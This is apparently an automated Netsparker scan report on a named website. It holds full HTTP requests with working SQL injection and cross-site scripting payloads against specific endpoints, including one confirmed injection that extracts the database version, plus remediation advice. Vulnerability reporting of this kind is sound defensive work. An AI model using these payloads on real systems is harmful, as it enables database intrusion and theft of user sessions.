  • /site/yeshiva/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002B1)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /sitemap.xml | - | - | Sitemap Identified | No
    /snif.asp | Query Based | Query String | Cross-site Scripting | Yes
    /snif.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000234)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /tags/ | q | GET | Cross-site Scripting | Yes
    /tags/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /tags/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BB)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /tags/tags.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /tags/tags.asp | - | - | [Possible] Internal Path Leakage (Windows) | No
    /tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CB)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /UploadImages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000109)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /uploadimages/2011_8_22_13_2_45.JPG'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000573)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /video/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /video/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CE)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /video/Default.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /vod/ | - | - | [Possible] Internal Path Leakage (*nix) | No
    /vod/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00016B)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /vod/vod.asp | id | GET | Cross-site Scripting | Yes
    /vod/vod.asp | - | - | [Possible] Internal Path Leakage (*nix) | No
    /vod/vod.asp | - | - | [Possible] Internal Path Leakage (Windows) | No
    /vod/vod.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000160)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes
    /yeshiva/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001AF)%3C/script%3E | URI-BASED | Full URL | Cross-site Scripting | Yes


  • 1 TOTAL | CRITICAL | CONFIRMED 1

    1. SQL Injection

    SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database.


    Impact
    Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

    - Reading, updating and deleting arbitrary data or tables from the database
    - Executing commands on the underlying operating system

    Actions to Take
    1. See the remedy for solution.
    2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
    3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
    4. Use your web logs and application logs to see if there were any previous but undetected attacks to this resource.

    Remedy
    A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

    Required Skills for Successful Exploitation
    There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.

    External References
    - OWASP SQL injection
    - SQL injection Cheatsheet

    Remedy References
    - MSDN - Protect From SQL injection in ASP.NET

    Classification
    OWASP A1, PCI v1.2-6.5.2, PCI v2.0-6.5.1, CWE-89, CAPEC-66, WASC-19

    1.1. /contact/ CONFIRMED
    http://www.shalomlaam.co.il/contact/

    Parameters
    Parameter | Type | Value
    action | POST | contact
    f_name | POST | Smith
    mail | POST |
    message | POST | 3
    name | POST | Smith
    name_id | POST | convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))
    phone | POST | 3
    sendFrom | POST | 3
    subject | POST | 3


  • Extracted Data
    microsoft sql server 2005 - 9.00.3042.00 (intel x86) feb 9 2007 22:47:07 copyright (c) 1988-2005 microsoft corporation express edition on windows nt 5.2 (build 3790: service pack 2)

    Request
    POST /contact/ HTTP/1.1
    Referer: http://www.shalomlaam.co.il/contact/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Content-Type: application/x-www-form-urlencoded
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Content-Length: 258
    Accept-Encoding: gzip, deflate

    action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&phone=3&sendFrom=3&subject=3

    Response
    "Arial" size=2>Microsoft OLE DB Provider for SQL Server error '80040e07'
    Conversion failed when converting the varchar value '_!@2dilemma' to data type int.
    /contact/Default.asp, line 46


  • 9 TOTAL | CRITICAL

    2. [Probable] SQL Injection

    SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

    Impact
    Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following types of attacks successfully:

    Reading, updating and deleting arbitrary data/tables from the database.
    Executing commands on the underlying operating system.

    Actions to Take
    1. See the remedy for solution.
    2. If you are not using a database access layer (DAL) within the architecture, consider its benefits and implement if appropriate. As a minimum, the use of a DAL will help centralize the issue and its resolution. You can also use ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL injection based problems.
    3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
    4. Monitor and review web logs and application logs to uncover active or previous exploitation attempts.

    Remedy
    A very robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

    Required Skills for Successful Exploitation
    There are numerous freely available tools to test for SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.

    External References
    OWASP SQL injection
    SQL injection Cheat Sheet

    Remedy References
    SQL injection Prevention Cheat Sheet
    MSDN - Protect From SQL injection in ASP.NET
    OWASP Preventing SQL injection in Java
    Prepared Statements and Stored Procedures in PHP

    Classification
    OWASP A1, PCI v1.2-6.5.2, PCI v2.0-6.5.1, CWE-89, CAPEC-66, WASC-19

  • 2.1. /contact/
    http://www.shalomlaam.co.il/contact/

    Parameters
    Parameter Type Value

    action POST contact

    f_name POST Smith

    mail POST

    message POST 3

    name POST Smith

    name_id POST 0

    phone POST 3

    sendFrom POST -1 or 1=1 and (select 1 and row(1,1)>(selectcount(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))xfrom (select 1 union select 2)a group by xlimit 1))

    subject POST 3

    Certainty

    Request
    POST /contact/ HTTP/1.1
    Referer: http://www.shalomlaam.co.il/contact/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Content-Type: application/x-www-form-urlencoded
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Content-Length: 438
    Accept-Encoding: gzip, deflate

    action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=3&sendFrom=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&subject=3

    Response
    src="pic/logo.jpg" width="130" height="130" alt="" />-->

    Microsoft OLE DB Provider for SQL Server error '80040e57'
    String or binary data would be truncated.
    /contact/Default.asp, line 46

  • 2.2. /contact/
    http://www.shalomlaam.co.il/contact/

    Parameters
    Parameter Type Value

    action POST contact

    f_name POST Smith

    mail POST

    message POST 3

    name POST -1 or 1=1 and (select 1 and row(1,1)>(selectcount(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))xfrom (select 1 union select 2)a group by xlimit 1))

    name_id POST 0

    phone POST 3

    sendFrom POST 3

    subject POST 3

    Certainty

    Request
    POST /contact/ HTTP/1.1
    Referer: http://www.shalomlaam.co.il/contact/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Content-Type: application/x-www-form-urlencoded
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Content-Length: 434
    Accept-Encoding: gzip, deflate

    action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&name_id=0&phone=3&sendFrom=3&subject=3

    Response
    src="pic/logo.jpg" width="130" height="130" alt="" />-->

    Microsoft OLE DB Provider for SQL Server error '80040e57'
    String or binary data would be truncated.
    /contact/Default.asp, line 46

  • 2.3. /contact/
    http://www.shalomlaam.co.il/contact/

    Parameters
    Parameter Type Value

    action POST contact

    f_name POST Smith

    mail POST

    message POST 3

    name POST Smith

    name_id POST 0

    phone POST (selectconvert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)

    sendFrom POST 3

    subject POST 3

    Certainty

    Request
    POST /contact/ HTTP/1.1
    Referer: http://www.shalomlaam.co.il/contact/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Content-Type: application/x-www-form-urlencoded
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Content-Length: 289
    Accept-Encoding: gzip, deflate

    action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)&sendFrom=3&subject=3

    Response
    src="pic/logo.jpg" width="130" height="130" alt="" />-->

    Microsoft OLE DB Provider for SQL Server error '80040e57'
    String or binary data would be truncated.
    /contact/Default.asp, line 46

  • 2.4. /contact/
    http://www.shalomlaam.co.il/contact/

    Parameters
    Parameter Type Value

    action POST contact

    f_name POST Smith

    mail POST

    message POST 3

    name POST Smith

    name_id POST 0

    phone POST 3

    sendFrom POST 3

    subject POST -1 or 1=1 and (select 1 and row(1,1)>(selectcount(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))xfrom (select 1 union select 2)a group by xlimit 1))

    Certainty

    Request
    POST /contact/ HTTP/1.1
    Referer: http://www.shalomlaam.co.il/contact/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Content-Type: application/x-www-form-urlencoded
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Content-Length: 438
    Accept-Encoding: gzip, deflate

    action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=3&sendFrom=3&subject=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))

    Response
    src="pic/logo.jpg" width="130" height="130" alt="" />-->

    Microsoft OLE DB Provider for SQL Server error '80040e57'
    String or binary data would be truncated.
    /contact/Default.asp, line 46

  • 2.5. /reg/
    http://www.shalomlaam.co.il/reg/

    Parameters
    Parameter Type Value

    action POST add

    bpdf POST 1

    btn1 POST

    email POST (selectconvert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)

    f_name POST Smith

    name POST Smith

    phone POST 3

    radio POST alon

    Certainty

    Request
    POST /reg/ HTTP/1.1
    Referer: http://www.shalomlaam.co.il/reg/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Content-Type: application/x-www-form-urlencoded
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Content-Length: 270
    Accept-Encoding: gzip, deflate

    action=add&bpdf=1&btn1=%ef%bf%bd%ef%bf%bd%ef%bf%bd&email=(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)&f_name=Smith&name=Smith&phone=3&radio=alon

    Response
    yle="background:url('images/kiv.gif') repeat-x; width:100%; height:2px;">

    Microsoft OLE DB Provider for SQL Server error '80040e57'
    String or binary data would be truncated.
    /reg/Default.asp, line 28

    2.6. /contact/
    http://www.shalomlaam.co.il/contact/

    Parameters
    Parameter Type Value

    action POST contact

    f_name POST -1 or 1=1 and (select 1 and row(1,1)>(selectcount(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))xfrom (select 1 union select 2)a group by xlimit 1))

    mail POST

    message POST 3

    name POST Smith

    name_id POST 0

    phone POST 3

    sendFrom POST 3

    subject POST 3

  • Certainty

    Request
    POST /contact/ HTTP/1.1
    Referer: http://www.shalomlaam.co.il/contact/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Content-Type: application/x-www-form-urlencoded
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Content-Length: 434
    Accept-Encoding: gzip, deflate

    action=contact&f_name=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=3&sendFrom=3&subject=3

    Response
    src="pic/logo.jpg" width="130" height="130" alt="" />-->

    Microsoft OLE DB Provider for SQL Server error '80040e57'
    String or binary data would be truncated.
    /contact/Default.asp, line 46

    -->

    Microsoft OLE DB Provider for SQL Server error '80040e14'
    Incorrect syntax near '27'.
    /contact/Default.asp, line 46

  • 2.8. /lessons/
    http://www.shalomlaam.co.il/lessons/

    Parameters
    Parameter Type Value

    action POST search

    yom POST '+ (selectconvert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

    snif POST 3

    subjects POST 0

    Certainty

    Request
    POST /lessons/ HTTP/1.1
    Referer: http://www.shalomlaam.co.il/lessons/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Content-Type: application/x-www-form-urlencoded
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Content-Length: 220
    Accept-Encoding: gzip, deflate

    action=search&yom='%2b%20(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)%20%2b'&snif=3&subjects=0

    Response
    td>

    Microsoft OLE DB Provider for ODBC Drivers error '80040e37'
    [Microsoft][ODBC Excel Driver]The Microsoft Jet database engine could not find the object 'syscolumns'. Make s

    2.9. /lessons/default.asp
    http://www.shalomlaam.co.il/lessons/default.asp

    Parameters
    Parameter Type Value

    action POST search

    yom POST '+ (selectconvert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

    snif POST 3

    subjects POST 0

    Certainty

    Request
    POST /lessons/default.asp HTTP/1.1
    Referer: http://www.shalomlaam.co.il/lessons/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Content-Type: application/x-www-form-urlencoded
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Content-Length: 220
    Accept-Encoding: gzip, deflate

    action=search&yom='%2b%20(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)%20%2b'&snif=3&subjects=0

  • Response
    td>

    Microsoft OLE DB Provider for ODBC Drivers error '80040e37'
    [Microsoft][ODBC Excel Driver]The Microsoft Jet database engine could not find the object 'syscolumns'. Make s

  • 150 TOTAL IMPORTANT CONFIRMED

    150

    3. Cross-site Scripting

    XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

    XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

    Impact
    There are many different attacks that can be leveraged through the use of cross-site scripting, including:

    Hijacking user's active session.
    Mounting phishing attacks.
    Intercepting data and performing man-in-the-middle attacks.

    Remedy
    The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.

    Remedy References
    Microsoft Anti-XSS Library
    OWASP XSS Prevention Cheat Sheet
    OWASP AntiSamy Java

    External References
    XSS Cheat Sheet
    OWASP - cross-site scripting
    XSS Shell
    XSS Tunnelling

    Proof of Concept Notes
    Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that:

    XSS filtering is a feature that's enabled by default in some of the modern browsers. It should only be disabled temporarily to test exploits and should be reverted back if the browser is actively used for other than testing purposes.
    Even though browsers have certain checks to prevent cross-site scripting attacks, in practice there are a variety of ways to bypass this mechanism, therefore a web application should not rely on this kind of client-side browser checks.

    Chrome

    Open command prompt.
    Go to folder where chrome.exe is located.
    Run the command chrome.exe --args --disable-xss-auditor

    Internet Explorer

    Click Tools->Internet Options and then navigate to the Security Tab.
    Click Custom level and scroll towards the bottom where you will find that Enable XSS filter is currently Enabled.
    Set it to disabled. Click OK.
    Click Yes to accept the warning followed by Apply.

    Firefox

    Go to about:config in the URL address bar.
    In the search field, type urlbar.filter and find browser.urlbar.filter.javascript.
    Set its value to false by double clicking the row.

    Classification
    OWASP A2, PCI v1.2-6.5.1, PCI v2.0-6.5.7, CWE-79, CAPEC-19, WASC-08

  • 3.1. /allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/script%3E
    CONFIRMED
    http://www.shalomlaam.co.il/allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3..

    Parameters
    Parameter Type Value

    URI-BASED Full URL '"-->alert(0x0001D1)

    Request
    GET /allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D1)%3C/script%3E HTTP/1.1
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Accept-Encoding: gzip, deflate

    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Date: Tue, 20 May 2014 13:48:00 GMT
    Content-Type: text/html
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Vary: Accept-Encoding
    Content-Length: 169
    Pragma: no-cache
    Expires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/allvideo/'"-->netsparker(0x0001D1)script>style>alert(0x00049B)

  • Request
    POST /contact/reg/maillingUpdate.asp?'"-->netsparker(0x00049B) HTTP/1.1
    Referer: http://www.shalomlaam.co.il/contact/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Content-Type: application/x-www-form-urlencoded
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Content-Length: 37
    Accept-Encoding: gzip, deflate

    emailtonews=netsparker%40example.com&

    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Date: Tue, 20 May 2014 14:03:14 GMT
    Content-Type: text/html
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Vary: Accept-Encoding
    Content-Length: 191
    Pragma: no-cache
    Expires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/contact/reg/maillingUpdate.asp?'"-->netsparker(0x00049B)script>style>

  • Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Date: Tue, 20 May 2014 13:47:53 GMT
    Content-Type: text/html
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Vary: Accept-Encoding
    Content-Length: 169
    Pragma: no-cache
    Expires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/bmidrash/'"-->netsparker(0x0001C7)script>style>netsparker(0x0001CE)script>style>

  • 3.8. /news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B7)%3C/script%3E
    CONFIRMED
    http://www.shalomlaam.co.il/news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B7)%3C/scr..

    Parameters
    Parameter Type Value

    URI-BASED Full URL '"-->alert(0x0001B7)

    Request
    GET /news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B7)%3C/script%3E HTTP/1.1
    Referer: http://www.shalomlaam.co.il/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Accept-Encoding: gzip, deflate

    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Date: Tue, 20 May 2014 13:47:29 GMT
    Content-Type: text/html
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Vary: Accept-Encoding
    Content-Length: 164
    Pragma: no-cache
    Expires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/news'"-->netsparker(0x0001B7)script>style>

  • 3.10. /js/delate_image.asp
    CONFIRMED
    http://www.shalomlaam.co.il/js/delate_image.asp?'"-->alert(0x0003D6)

    Parameters
    Parameter Type Value

    field GET picture_

    Query Based Query String '"-->alert(0x0003D6)

    Request
    GET /js/delate_image.asp?'"-->netsparker(0x0003D6) HTTP/1.1
    Referer: http://www.shalomlaam.co.il/js/func_site.js
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
